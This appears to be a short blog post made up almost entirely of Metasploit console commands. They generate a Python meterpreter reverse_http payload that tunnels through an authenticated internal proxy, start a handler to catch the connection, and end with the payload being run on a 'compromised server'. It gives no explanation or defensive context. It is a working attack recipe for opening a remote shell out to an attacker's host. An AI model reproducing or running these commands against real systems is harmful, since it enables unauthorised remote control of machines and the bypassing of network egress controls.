Attacker's host
msf >use payload/python/meterpreter/reverse_httpmsf payload(reverse_http) >set lhost LOCAL_PUBLIC_IPmsf payload(reverse_http) >set lport 80msf payload(reverse_http) >set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY:IPmsf payload(reverse_http) >set payloadproxyport INTERNAL_PROXY_PORTmsf payload(reverse_http) >generate -b '\x00\xff' -t raw -f met.pymsf >use exploit/multi/handlermsf exploit(handler) >set payload python/meterpreter/reverse_httpmsf exploit(handler) >set lhost LOCAL_PUBLIC_IPmsf exploit(handler) >set lport 80msf exploit(handler) >set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY:IPmsf exploit(handler) >set PayloadProxyPort INTERNAL_PROXY_PORTmsf exploit(handler) >run
Compromised server
# python met.py
No comments:
Post a Comment